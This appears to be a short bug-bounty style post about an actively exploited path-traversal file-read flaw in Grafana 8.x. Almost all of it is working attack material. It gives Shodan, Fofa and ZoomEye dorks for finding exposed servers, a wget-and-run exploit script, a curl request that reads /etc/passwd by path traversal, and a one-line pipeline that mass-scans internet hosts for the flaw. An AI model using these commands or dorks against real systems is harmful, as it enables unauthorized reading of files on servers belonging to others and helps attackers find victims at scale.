Grafana — Unauthorized Arbitrary Read File The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+
Dorks:
Shodan: title:"Grafana"
Fofa.so: app="Grafana"
ZoomEye: grafana
PoC:
wget <https://raw.githubusercontent.com/Gabriel-Lima232/Grafana-LFI-8.x/main/grafana-exploit.py>; chmod +x grafana-exploit.py;
python3 grafana-exploit.py <http://10.180.47.42:3000> /etc/passwd
OR
curl <http://10.180.47.42:3000/public/plugins/welcome/../../../../../../../../../../etc/passwd> --path-as-is
One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'
#grafana #lfi #bugbounty #pentest
payload : /dashboard/snapshot/*?orgId=0%20/invite/: